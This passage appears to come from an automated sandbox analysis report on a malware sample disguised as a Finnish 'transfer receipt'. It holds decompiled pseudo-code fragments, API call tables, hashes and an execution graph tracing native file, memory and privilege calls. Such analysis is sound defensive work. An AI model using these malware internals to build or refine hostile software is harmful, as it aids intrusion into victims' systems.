                                                                                                                      								E10001563( *0x10004074, _t33 + 4, _t41);
                                                                                                                      								_t59 = _t59 + 0xc;
                                                                                                                      								_t36 =  *0x10004040;
                                                                                                                      								GlobalFree(_t36);
                                                                                                                      								 *0x10004040 =  *_t36;
                                                                                                                      							}
                                                                                                                      							goto L14;
                                                                                                                      						}
                                                                                                                      						_t38 = _t19 - 0x4c;
                                                                                                                      						if(_t38 == 0) {
                                                                                                                      							goto L17;
                                                                                                                      						}
                                                                                                                      						_t39 = _t38 - 4;
                                                                                                                      						if(_t39 == 0) {
                                                                                                                      							 *_t54 =  *_t54 + 0xa;
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						_t26 = _t39 - _t42;
                                                                                                                      						if(_t26 == 0) {
                                                                                                                      							 *_t54 =  *_t54 + 0xa;
                                                                                                                      							goto L10;
                                                                                                                      						}
                                                                                                                      						goto L7;
                                                                                                                      						L14:
                                                                                                                      					} while ( *_t52 != 0);
                                                                                                                      					_t17 = _v0;
                                                                                                                      					goto L16;
                                                                                                                      				}
                                                                                                                      			}





















                                                                                                                      0x100010e6
                                                                                                                      0x100010f0
                                                                                                                      0x100010ff
                                                                                                                      0x1000110e
                                                                                                                      0x10001119
                                                                                                                      0x1000111c
                                                                                                                      0x1000112b
                                                                                                                      0x1000112f
                                                                                                                      0x10001131
                                                                                                                      0x100011d8
                                                                                                                      0x100011de
                                                                                                                      0x10001137
                                                                                                                      0x10001138
                                                                                                                      0x10001138
                                                                                                                      0x1000113d
                                                                                                                      0x1000113e
                                                                                                                      0x10001140
                                                                                                                      0x10001143
                                                                                                                      0x1000120d
                                                                                                                      0x10001210
                                                                                                                      0x100011b0
                                                                                                                      0x100011b6
                                                                                                                      0x100011bf
                                                                                                                      0x100011c4
                                                                                                                      0x100011c7
                                                                                                                      0x00000000
                                                                                                                      0x100011c7
                                                                                                                      0x10001212
                                                                                                                      0x10001214
                                                                                                                      0x10001196
                                                                                                                      0x1000119d
                                                                                                                      0x100011a5
                                                                                                                      0x00000000
                                                                                                                      0x100011a5
                                                                                                                      0x10001161
                                                                                                                      0x10001162
                                                                                                                      0x1000116a
                                                                                                                      0x10001177
                                                                                                                      0x1000117f
                                                                                                                      0x10001188
                                                                                                                      0x1000118d
                                                                                                                      0x1000118d
                                                                                                                      0x00000000
                                                                                                                      0x10001162
                                                                                                                      0x10001149
                                                                                                                      0x100011df
                                                                                                                      0x100011df
                                                                                                                      0x100011e6
                                                                                                                      0x100011f3
                                                                                                                      0x100011f8
                                                                                                                      0x100011fb
                                                                                                                      0x10001203
                                                                                                                      0x10001205
                                                                                                                      0x10001205
                                                                                                                      0x00000000
                                                                                                                      0x100011e6
                                                                                                                      0x1000114f
                                                                                                                      0x10001152
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10001158
                                                                                                                      0x1000115b
                                                                                                                      0x100011ac
                                                                                                                      0x00000000
                                                                                                                      0x100011ac
                                                                                                                      0x1000115d
                                                                                                                      0x1000115f
                                                                                                                      0x10001192
                                                                                                                      0x00000000
                                                                                                                      0x10001192
                                                                                                                      0x00000000
                                                                                                                      0x100011c9
                                                                                                                      0x100011c9
                                                                                                                      0x100011d3
                                                                                                                      0x00000000
                                                                                                                      0x100011d7

                                                                                                                      APIs
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19421717588.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19421678749.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421756473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421792485.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1780285237-0
                                                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00405E07(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                                                      				int _v8;
                                                                                                                      				int _t12;
                                                                                                                      				int _t14;
                                                                                                                      				int _t15;
                                                                                                                      				CHAR* _t17;
                                                                                                                      				CHAR* _t27;
                                                                                                                      
                                                                                                                      				_t12 = lstrlenA(_a8);
                                                                                                                      				_t27 = _a4;
                                                                                                                      				_v8 = _t12;
                                                                                                                      				while(lstrlenA(_t27) >= _v8) {
                                                                                                                      					_t14 = _v8;
                                                                                                                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                                                      					_t15 = lstrcmpiA(_t27, _a8);
                                                                                                                      					_t27[_v8] =  *(_t14 + _t27);
                                                                                                                      					if(_t15 == 0) {
                                                                                                                      						_t17 = _t27;
                                                                                                                      					} else {
                                                                                                                      						_t27 = CharNextA(_t27);
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					L5:
                                                                                                                      					return _t17;
                                                                                                                      				}
                                                                                                                      				_t17 = 0;
                                                                                                                      				goto L5;
                                                                                                                      			}









                                                                                                                      0x00405e17
                                                                                                                      0x00405e19
                                                                                                                      0x00405e1c
                                                                                                                      0x00405e48
                                                                                                                      0x00405e21
                                                                                                                      0x00405e2a
                                                                                                                      0x00405e2f
                                                                                                                      0x00405e3a
                                                                                                                      0x00405e3d
                                                                                                                      0x00405e59
                                                                                                                      0x00405e3f
                                                                                                                      0x00405e46
                                                                                                                      0x00000000
                                                                                                                      0x00405e46
                                                                                                                      0x00405e52
                                                                                                                      0x00405e56
                                                                                                                      0x00405e56
                                                                                                                      0x00405e50
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E17
                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E2F
                                                                                                                      • CharNextA.USER32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E40
                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,004060F0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E49
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 190613189-0
                                                                                                                      • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                      • Instruction ID: dc3323509655add47458b7bfdc28b409d7665b879035d0867add309d4545c2bc
                                                                                                                      • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                      • Instruction Fuzzy Hash: 89F06236104518EFC7029BA5DD40D9FBBA8EF06354B2540BAE980F7211D674DF01AB99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.4%
                                                                                                                      Dynamic/Decrypted Code Coverage:1.3%
                                                                                                                      Signature Coverage:1.7%
                                                                                                                      Total number of Nodes:1197
                                                                                                                      Total number of Limit Nodes:134
                                                                                                                      execution_graph 81953 339960 81954 339985 81953->81954 81959 33b3a0 81954->81959 81958 3399da 81960 33b3c4 81959->81960 81961 33b400 LdrLoadDll 81960->81961 81962 3399b8 81960->81962 81961->81962 81962->81958 81963 33cf80 81962->81963 81964 33cfac 81963->81964 81974 34c900 81964->81974 81967 33cfd0 81967->81958 81971 33d00b 81985 34cbb0 81971->81985 81973 33d02e 81973->81958 81988 34d6b0 81974->81988 81976 33cfc9 81976->81967 81977 34c940 81976->81977 81978 34c95c 81977->81978 81979 34d6b0 LdrLoadDll 81977->81979 81998 4682bc0 LdrInitializeThunk 81978->81998 81979->81978 81980 33cff3 81980->81967 81982 34cf20 81980->81982 81983 34d6b0 LdrLoadDll 81982->81983 81984 34cf3c 81983->81984 81984->81971 81986 34d6b0 LdrLoadDll 81985->81986 81987 34cbcc NtClose 81986->81987 81987->81973 81990 34d73b 81988->81990 81991 34d6bf 81988->81991 81990->81976 81991->81990 81992 347aa0 81991->81992 81993 347aba 81992->81993 81994 347aae 81992->81994 81993->81990 81994->81993 81997 347f20 LdrLoadDll 81994->81997 81996 347c0c 81996->81990 81997->81996 81998->81980 81999 34b7e0 82010 34e580 81999->82010 82001 34b916 82002 34b81b 82002->82001 82003 33b3a0 LdrLoadDll 82002->82003 82004 34b85b 82003->82004 82005 347aa0 LdrLoadDll 82004->82005 82009 34b880 82005->82009 82006 34b890 Sleep 82006->82009 82009->82001 82009->82006 82013 34b450 LdrLoadDll 82009->82013 82014 34b630 LdrLoadDll 82009->82014 82015 34cc60 82010->82015 82012 34e5b1 82012->82002 82013->82009 82014->82009 82016 34d6b0 LdrLoadDll 82015->82016 82017 34cc7c NtAllocateVirtualMemory 82016->82017 82017->82012 82019 35177d 82022 34e1a0 82019->82022 82023 34e1c6 82022->82023 82030 33a330 82023->82030 82025 34e1d2 82026 34e200 82025->82026 82038 339330 82025->82038 82070 34cdd0 82026->82070 82074 33a280 82030->82074 82032 33a33d 82033 33a344 82032->82033 82086 33a220 82032->82086 82033->82025 82039 339357 82038->82039 82523 33b870 82039->82523 82041 339369 82527 33b5c0 82041->82527 82043 33939e 82050 3393a5 82043->82050 82581 33b4f0 LdrLoadDll 82043->82581 82046 339415 82047 34e6f0 2 API calls 82046->82047 82068 33965a 82046->82068 82048 33942b 82047->82048 82049 34e6f0 2 API calls 82048->82049 82051 33943c 82049->82051 82050->82068 82531 33e580 82050->82531 82052 34e6f0 2 API calls 82051->82052 82053 33944d 82052->82053 82543 33cb00 82053->82543 82055 339457 82056 347690 10 API calls 82055->82056 82057 339468 82056->82057 82058 347690 10 API calls 82057->82058 82059 339479 82058->82059 82060 33949d 82059->82060 82061 347690 10 API calls 82059->82061 82062 347690 10 API calls 82060->82062 82069 3394e5 82060->82069 82063 339496 82061->82063 82065 3394b4 82062->82065 82582 33cc50 LdrLoadDll 82063->82582 82065->82069 82583 33d5f0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 82065->82583 82068->82026 82069->82068 82555 338e50 82069->82555 82071 34cde6 82070->82071 82072 34d6b0 LdrLoadDll 82071->82072 82073 34cdec 82072->82073 82105 34b360 82074->82105 82078 33a2ad 82078->82032 82079 33a2a0 82079->82078 82112 34da40 82079->82112 82081 33a2ed 82081->82078 82123 33a0c0 82081->82123 82083 33a30c 82129 339b20 LdrLoadDll 82083->82129 82085 33a31e 82085->82032 82504 34dd40 82086->82504 82089 34dd40 LdrLoadDll 82090 33a251 82089->82090 82091 34dd40 LdrLoadDll 82090->82091 82092 33a26a 82091->82092 82093 33e340 82092->82093 82094 33e359 82093->82094 82508 33b6f0 82094->82508 82096 33e36c 82097 34c900 LdrLoadDll 82096->82097 82098 33e37f 82097->82098 82099 33a355 82098->82099 82512 34cee0 82098->82512 82099->82025 82101 33e396 82102 33e3c1 82101->82102 82515 34c980 82101->82515 82104 34cbb0 2 API calls 82102->82104 82104->82099 82106 34b36f 82105->82106 82107 347aa0 LdrLoadDll 82106->82107 82108 33a297 82107->82108 82109 34b230 82108->82109 82130 34cd20 82109->82130 82113 34da59 82112->82113 82133 347690 82113->82133 82115 34da71 82116 34da7a 82115->82116 82172 34d870 82115->82172 82116->82081 82118 34da8e 82118->82116 82189 34c620 82118->82189 82120 34dac9 82194 34e610 82120->82194 82482 3376d0 82123->82482 82125 33a0e1 82125->82083 82126 33a0da 82126->82125 82495 337990 82126->82495 82129->82085 82131 34d6b0 LdrLoadDll 82130->82131 82132 34b245 82131->82132 82132->82079 82134 3479d3 82133->82134 82136 3476a4 82133->82136 82134->82115 82136->82134 82197 34c370 82136->82197 82138 3477d5 82203 34ca80 82138->82203 82139 3477b8 82200 34cb80 82139->82200 82142 3477c2 82142->82115 82143 3477fc 82144 34e610 2 API calls 82143->82144 82147 347808 82144->82147 82145 347997 82148 34cbb0 2 API calls 82145->82148 82146 3479ad 82260 3473c0 82146->82260 82147->82142 82147->82145 82147->82146 82152 3478a0 82147->82152 82149 34799e 82148->82149 82149->82115 82151 3479c0 82151->82115 82153 347907 82152->82153 82154 3478af 82152->82154 82153->82145 82155 34791a 82153->82155 82157 3478b4 82154->82157 82158 3478c8 82154->82158 82299 34ca00 82155->82299 82298 347280 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 82157->82298 82161 3478e5 82158->82161 82162 3478cd 82158->82162 82161->82149 82218 347040 82161->82218 82206 347320 82162->82206 82164 3478be 82164->82115 82166 34797a 82169 34cbb0 2 API calls 82166->82169 82167 3478db 82167->82115 82171 347986 82169->82171 82170 3478fd 82170->82115 82171->82115 82173 34d88b 82172->82173 82174 34d89d 82173->82174 82175 34e580 2 API calls 82173->82175 82174->82118 82176 34d8bd 82175->82176 82326 346ca0 82176->82326 82178 34d8e0 82178->82174 82179 346ca0 3 API calls 82178->82179 82181 34d902 82179->82181 82181->82174 82358 347ff0 82181->82358 82182 34d98a 82183 34d99a 82182->82183 82453 34d630 LdrLoadDll 82182->82453 82369 34d4a0 82183->82369 82186 34d9c8 82448 34c5e0 82186->82448 82188 34d9f5 82188->82118 82190 34d6b0 LdrLoadDll 82189->82190 82191 34c63c 82190->82191 82476 4682b2a 82191->82476 82192 34c657 82192->82120 82479 34cd90 82194->82479 82196 34daf7 82196->82081 82198 34d6b0 LdrLoadDll 82197->82198 82199 347789 82198->82199 82199->82138 82199->82139 82199->82142 82201 34cb9c NtDeleteFile 82200->82201 82202 34d6b0 LdrLoadDll 82200->82202 82201->82142 82202->82201 82204 34ca9c NtCreateFile 82203->82204 82205 34d6b0 LdrLoadDll 82203->82205 82204->82143 82205->82204 82207 34733c 82206->82207 82208 34ca00 LdrLoadDll 82207->82208 82209 34735d 82208->82209 82210 347364 82209->82210 82211 347378 82209->82211 82212 34cbb0 2 API calls 82210->82212 82213 34cbb0 2 API calls 82211->82213 82214 34736d 82212->82214 82215 347381 82213->82215 82214->82167 82303 34e730 LdrLoadDll RtlAllocateHeap 82215->82303 82217 34738c 82217->82167 82219 3470be 82218->82219 82220 34708b 82218->82220 82222 347209 82219->82222 82226 3470da 82219->82226 82221 34ca00 LdrLoadDll 82220->82221 82223 3470a6 82221->82223 82224 34ca00 LdrLoadDll 82222->82224 82225 34cbb0 2 API calls 82223->82225 82230 347224 82224->82230 82227 3470af 82225->82227 82228 34ca00 LdrLoadDll 82226->82228 82227->82170 82229 3470f5 82228->82229 82232 347111 82229->82232 82233 3470fc 82229->82233 82316 34ca40 LdrLoadDll 82230->82316 82235 347116 82232->82235 82240 34712c 82232->82240 82234 34cbb0 2 API calls 82233->82234 82238 347105 82234->82238 82239 34cbb0 2 API calls 82235->82239 82236 34725e 82237 34cbb0 2 API calls 82236->82237 82241 347269 82237->82241 82238->82170 82242 34711f 82239->82242 82243 347131 82240->82243 82304 34e6f0 82240->82304 82241->82170 82242->82170 82253 347143 82243->82253 82307 34cb30 82243->82307 82246 347197 82247 3471ae 82246->82247 82315 34c9c0 LdrLoadDll 82246->82315 82249 3471b5 82247->82249 82250 3471ca 82247->82250 82251 34cbb0 2 API calls 82249->82251 82252 34cbb0 2 API calls 82250->82252 82251->82253 82254 3471d3 82252->82254 82253->82170 82255 3471ff 82254->82255 82310 34e400 82254->82310 82255->82170 82257 3471ea 82258 34e610 2 API calls 82257->82258 82259 3471f3 82258->82259 82259->82170 82261 3473fe 82260->82261 82262 34ca00 LdrLoadDll 82260->82262 82263 347407 82261->82263 82264 34741c 82261->82264 82262->82261 82265 34cbb0 2 API calls 82263->82265 82266 347484 82264->82266 82267 347440 82264->82267 82277 347410 82265->82277 82269 3474c6 82266->82269 82270 347489 82266->82270 82268 34cae0 2 API calls 82267->82268 82271 347462 82268->82271 82272 3474d8 82269->82272 82273 347650 82269->82273 82275 34cb30 2 API calls 82270->82275 82270->82277 82274 34cbb0 2 API calls 82271->82274 82276 3474dd 82272->82276 82285 347518 82272->82285 82273->82277 82282 34cbb0 2 API calls 82273->82282 82274->82277 82278 3474b0 82275->82278 82279 34cae0 2 API calls 82276->82279 82277->82151 82280 34cbb0 2 API calls 82278->82280 82281 347500 82279->82281 82283 3474b9 82280->82283 82286 34cbb0 2 API calls 82281->82286 82287 347681 82282->82287 82283->82151 82284 34751d 82284->82277 82289 34cae0 2 API calls 82284->82289 82285->82284 82293 3475f9 82285->82293 82288 347509 82286->82288 82287->82151 82288->82151 82290 347540 82289->82290 82291 34cbb0 2 API calls 82290->82291 82292 34754b 82291->82292 82292->82151 82293->82277 82320 34cae0 82293->82320 82296 34cbb0 2 API calls 82297 347641 82296->82297 82297->82151 82298->82164 82300 347962 82299->82300 82301 34d6b0 LdrLoadDll 82299->82301 82302 34ca40 LdrLoadDll 82300->82302 82301->82300 82302->82166 82303->82217 82317 34cd50 82304->82317 82306 34e70b 82306->82243 82308 34d6b0 LdrLoadDll 82307->82308 82309 34cb4c NtReadFile 82308->82309 82309->82246 82311 34e424 82310->82311 82312 34e40d 82310->82312 82311->82257 82312->82311 82313 34e6f0 2 API calls 82312->82313 82314 34e43b 82313->82314 82314->82257 82315->82247 82316->82236 82318 34d6b0 LdrLoadDll 82317->82318 82319 34cd6c RtlAllocateHeap 82318->82319 82319->82306 82321 34d6b0 LdrLoadDll 82320->82321 82322 34cafc 82321->82322 82325 4682a10 LdrInitializeThunk 82322->82325 82323 347638 82323->82296 82325->82323 82327 346cb1 82326->82327 82329 346cb9 82326->82329 82327->82178 82328 346f8c 82328->82178 82329->82328 82454 34f790 82329->82454 82331 346d0d 82332 34f790 2 API calls 82331->82332 82336 346d18 82332->82336 82333 346d66 82335 34f790 2 API calls 82333->82335 82339 346d7a 82335->82339 82336->82333 82337 34f8c0 3 API calls 82336->82337 82468 34f830 LdrLoadDll RtlAllocateHeap RtlFreeHeap 82336->82468 82337->82336 82338 346dd7 82340 34f790 2 API calls 82338->82340 82339->82338 82459 34f8c0 82339->82459 82341 346ded 82340->82341 82343 346e2a 82341->82343 82345 34f8c0 3 API calls 82341->82345 82344 34f790 2 API calls 82343->82344 82346 346e35 82344->82346 82345->82341 82347 34f8c0 3 API calls 82346->82347 82354 346e6f 82346->82354 82347->82346 82350 34f7f0 2 API calls 82351 346f6e 82350->82351 82352 34f7f0 2 API calls 82351->82352 82353 346f78 82352->82353 82355 34f7f0 2 API calls 82353->82355 82465 34f7f0 82354->82465 82356 346f82 82355->82356 82357 34f7f0 2 API calls 82356->82357 82357->82328 82359 348001 82358->82359 82360 347690 10 API calls 82359->82360 82365 348017 82360->82365 82361 348020 82361->82182 82362 348057 82363 34e610 2 API calls 82362->82363 82364 348068 82363->82364 82364->82182 82365->82361 82365->82362 82366 3480a3 82365->82366 82367 34e610 2 API calls 82366->82367 82368 3480a8 82367->82368 82368->82182 82469 34d330 82369->82469 82371 34d4b4 82372 34d330 LdrLoadDll 82371->82372 82373 34d4bd 82372->82373 82374 34d330 LdrLoadDll 82373->82374 82375 34d4c6 82374->82375 82376 34d330 LdrLoadDll 82375->82376 82377 34d4cf 82376->82377 82378 34d330 LdrLoadDll 82377->82378 82379 34d4d8 82378->82379 82380 34d330 LdrLoadDll 82379->82380 82381 34d4e1 82380->82381 82382 34d330 LdrLoadDll 82381->82382 82383 34d4ed 82382->82383 82384 34d330 LdrLoadDll 82383->82384 82385 34d4f6 82384->82385 82386 34d330 LdrLoadDll 82385->82386 82387 34d4ff 82386->82387 82388 34d330 LdrLoadDll 82387->82388 82389 34d508 82388->82389 82390 34d330 LdrLoadDll 82389->82390 82391 34d511 82390->82391 82392 34d330 LdrLoadDll 82391->82392 82393 34d51a 82392->82393 82394 34d330 LdrLoadDll 82393->82394 82395 34d526 82394->82395 82396 34d330 LdrLoadDll 82395->82396 82397 34d52f 82396->82397 82398 34d330 LdrLoadDll 82397->82398 82399 34d538 82398->82399 82400 34d330 LdrLoadDll 82399->82400 82401 34d541 82400->82401 82402 34d330 LdrLoadDll 82401->82402 82403 34d54a 82402->82403 82404 34d330 LdrLoadDll 82403->82404 82405 34d553 82404->82405 82406 34d330 LdrLoadDll 82405->82406 82407 34d55f 82406->82407 82408 34d330 LdrLoadDll 82407->82408 82409 34d568 82408->82409 82410 34d330 LdrLoadDll 82409->82410 82411 34d571 82410->82411 82412 34d330 LdrLoadDll 82411->82412 82413 34d57a 82412->82413 82414 34d330 LdrLoadDll 82413->82414 82415 34d583 82414->82415 82416 34d330 LdrLoadDll 82415->82416 82417 34d58c 82416->82417 82418 34d330 LdrLoadDll 82417->82418 82419 34d598 82418->82419 82420 34d330 LdrLoadDll 82419->82420 82421 34d5a1 82420->82421 82422 34d330 LdrLoadDll 82421->82422 82423 34d5aa 82422->82423 82424 34d330 LdrLoadDll 82423->82424 82425 34d5b3 82424->82425 82426 34d330 LdrLoadDll 82425->82426 82427 34d5bc 82426->82427 82428 34d330 LdrLoadDll 82427->82428 82429 34d5c5 82428->82429 82430 34d330 LdrLoadDll 82429->82430 82431 34d5d1 82430->82431 82432 34d330 LdrLoadDll 82431->82432 82433 34d5da 82432->82433 82434 34d330 LdrLoadDll 82433->82434 82435 34d5e3 82434->82435 82436 34d330 LdrLoadDll 82435->82436 82437 34d5ec 82436->82437 82438 34d330 LdrLoadDll 82437->82438 82439 34d5f5 82438->82439 82440 34d330 LdrLoadDll 82439->82440 82441 34d5fe 82440->82441 82442 34d330 LdrLoadDll 82441->82442 82443 34d60a 82442->82443 82444 34d330 LdrLoadDll 82443->82444 82445 34d613 82444->82445 82446 34d330 LdrLoadDll 82445->82446 82447 34d61c 82446->82447 82447->82186 82449 34d6b0 LdrLoadDll 82448->82449 82450 34c5fc 82449->82450 82475 4682d10 LdrInitializeThunk 82450->82475 82451 34c613 82451->82188 82453->82183 82455 34f7a6 82454->82455 82456 34f7a0 82454->82456 82457 34e6f0 2 API calls 82455->82457 82456->82331 82458 34f7cc 82457->82458 82458->82331 82460 34f830 82459->82460 82461 34f88d 82460->82461 82462 34e6f0 2 API calls 82460->82462 82461->82339 82463 34f86a 82462->82463 82464 34e610 2 API calls 82463->82464 82464->82461 82466 34e610 2 API calls 82465->82466 82467 346f64 82466->82467 82467->82350 82468->82336 82470 34d34b 82469->82470 82471 347aa0 LdrLoadDll 82470->82471 82472 34d36b 82471->82472 82473 347aa0 LdrLoadDll 82472->82473 82474 34d41f 82472->82474 82473->82474 82474->82371 82474->82474 82475->82451 82477 4682b3f LdrInitializeThunk 82476->82477 82478 4682b31 82476->82478 82477->82192 82478->82192 82480 34d6b0 LdrLoadDll 82479->82480 82481 34cdac RtlFreeHeap 82480->82481 82481->82196 82483 3376e0 82482->82483 82484 3376db 82482->82484 82485 34e580 2 API calls 82483->82485 82484->82126 82488 337705 82485->82488 82486 33776c 82486->82126 82487 34c5e0 2 API calls 82487->82488 82488->82486 82488->82487 82489 337772 82488->82489 82494 34e580 2 API calls 82488->82494 82498 34cce0 82488->82498 82490 33779c 82489->82490 82492 34cce0 2 API calls 82489->82492 82490->82126 82493 33778d 82492->82493 82493->82126 82494->82488 82496 34cce0 2 API calls 82495->82496 82497 3379b2 82496->82497 82497->82083 82499 34d6b0 LdrLoadDll 82498->82499 82500 34ccfc 82499->82500 82503 4682b90 LdrInitializeThunk 82500->82503 82501 34cd13 82501->82488 82503->82501 82505 34dd63 82504->82505 82506 33b3a0 LdrLoadDll 82505->82506 82507 33a23d 82506->82507 82507->82089 82509 33b713 82508->82509 82511 33b790 82509->82511 82521 34c3b0 LdrLoadDll 82509->82521 82511->82096 82513 34d6b0 LdrLoadDll 82512->82513 82514 34cefc LookupPrivilegeValueW 82513->82514 82514->82101 82516 34c996 82515->82516 82517 34d6b0 LdrLoadDll 82516->82517 82518 34c99c 82517->82518 82522 4682dc0 LdrInitializeThunk 82518->82522 82519 34c9bb 82519->82102 82521->82511 82522->82519 82524 33b897 82523->82524 82525 33b6f0 LdrLoadDll 82524->82525 82526 33b8fa 82525->82526 82526->82041 82528 33b5e4 82527->82528 82584 34c3b0 LdrLoadDll 82528->82584 82530 33b61e 82530->82043 82532 33e5ac 82531->82532 82533 33b870 LdrLoadDll 82532->82533 82534 33e5be 82533->82534 82585 33e450 82534->82585 82537 33e5f1 82539 33e602 82537->82539 82542 34cbb0 2 API calls 82537->82542 82538 33e5d9 82540 33e5e4 82538->82540 82541 34cbb0 2 API calls 82538->82541 82539->82046 82540->82046 82541->82540 82542->82539 82544 33cb16 82543->82544 82545 33cb20 82543->82545 82544->82055 82546 33b6f0 LdrLoadDll 82545->82546 82547 33cb91 82546->82547 82548 33b5c0 LdrLoadDll 82547->82548 82549 33cba5 82548->82549 82550 33cbc8 82549->82550 82551 33b6f0 LdrLoadDll 82549->82551 82550->82055 82552 33cbe4 82551->82552 82553 347690 10 API calls 82552->82553 82554 33cc39 82553->82554 82554->82055 82604 33e840 82555->82604 82557 339321 82557->82068 82558 338e6a 82558->82557 82610 346fd0 82558->82610 82560 34f790 2 API calls 82561 33906e 82560->82561 82562 34f8c0 3 API calls 82561->82562 82564 339083 82562->82564 82563 338ec9 82563->82557 82563->82560 82575 339096 82564->82575 82613 338560 82564->82613 82566 339112 82568 3376d0 4 API calls 82566->82568 82566->82575 82567 3376d0 4 API calls 82567->82575 82571 33914b 82568->82571 82569 33e7e0 2 API calls 82569->82575 82573 3391bf 82571->82573 82571->82575 82627 33c840 82571->82627 82574 337990 2 API calls 82573->82574 82580 3391c9 82574->82580 82575->82557 82575->82567 82575->82569 82576 33c840 10 API calls 82575->82576 82578 337990 2 API calls 82575->82578 82681 33e240 82575->82681 82576->82575 82578->82575 82579 33e240 25 API calls 82579->82580 82580->82575 82580->82579 82677 33e7e0 82580->82677 82581->82050 82582->82060 82583->82069 82584->82530 82586 33e46a 82585->82586 82594 33e520 82585->82594 82587 33b6f0 LdrLoadDll 82586->82587 82588 33e48c 82587->82588 82595 34c660 82588->82595 82590 33e4ce 82598 34c6a0 82590->82598 82593 34cbb0 2 API calls 82593->82594 82594->82537 82594->82538 82596 34d6b0 LdrLoadDll 82595->82596 82597 34c67c 82596->82597 82597->82590 82599 34d6b0 LdrLoadDll 82598->82599 82600 34c6bc 82599->82600 82603 46834e0 LdrInitializeThunk 82600->82603 82601 33e514 82601->82593 82603->82601 82605 33e84d 82604->82605 82606 347aa0 LdrLoadDll 82605->82606 82607 33e865 82606->82607 82608 33e873 82607->82608 82609 33e86c SetErrorMode 82607->82609 82608->82558 82609->82608 82695 33e610 82610->82695 82612 346ffa 82612->82563 82614 338587 82613->82614 82615 3376d0 4 API calls 82614->82615 82622 33872e 82614->82622 82616 3385e1 82615->82616 82617 337990 2 API calls 82616->82617 82616->82622 82618 338669 82617->82618 82619 3376d0 4 API calls 82618->82619 82618->82622 82620 33867e 82619->82620 82621 337990 2 API calls 82620->82621 82620->82622 82624 3386de 82621->82624 82622->82566 82623 3376d0 4 API calls 82623->82624 